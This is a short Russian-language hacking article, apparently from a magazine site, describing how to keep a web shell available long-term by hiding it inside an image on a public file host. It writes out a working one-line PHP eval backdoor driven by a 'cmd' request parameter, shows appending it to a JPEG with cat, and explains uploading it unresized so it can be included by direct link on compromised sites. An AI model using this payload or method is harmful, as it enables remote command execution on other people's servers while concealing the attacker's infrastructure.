Я не буду описывать способы всем давно
известные (можно положить на свой сервер, на народ, на залитый
уже шелл), но есть способ, о котором мне еще слышать не
приходилось, — он позволяет хранить шелл достаточно долго и при
этом не палить свои сервера и шеллы. Заливать шелл будем на
файловый хостинг, который дает прямые линки на хранимые файлы.
Предложил использовать этот способ geezer_code.

1. Создаем
любое изображение.

$ echo "<?php eval($_REQUEST[cmd]);?>" >
simple_shell.php
$ cat 1.jpeg simple_shell.php >> poisoned.jpeg

Картинка готова к загрузке.

2. Загружаем ее без ресайзинга и любых других преобразований
(это важно), например, на
imageshack.us.

3. Теперь можно инклудить ее по прямой ссылке с
файлообменника.

Оставить мнение

Check Also

Windows 10 против шифровальщиков. Как устроена защита в обновленной Windows 10

Этой осенью Windows 10 обновилась до версии 1709 с кодовым названием Fall Creators Update …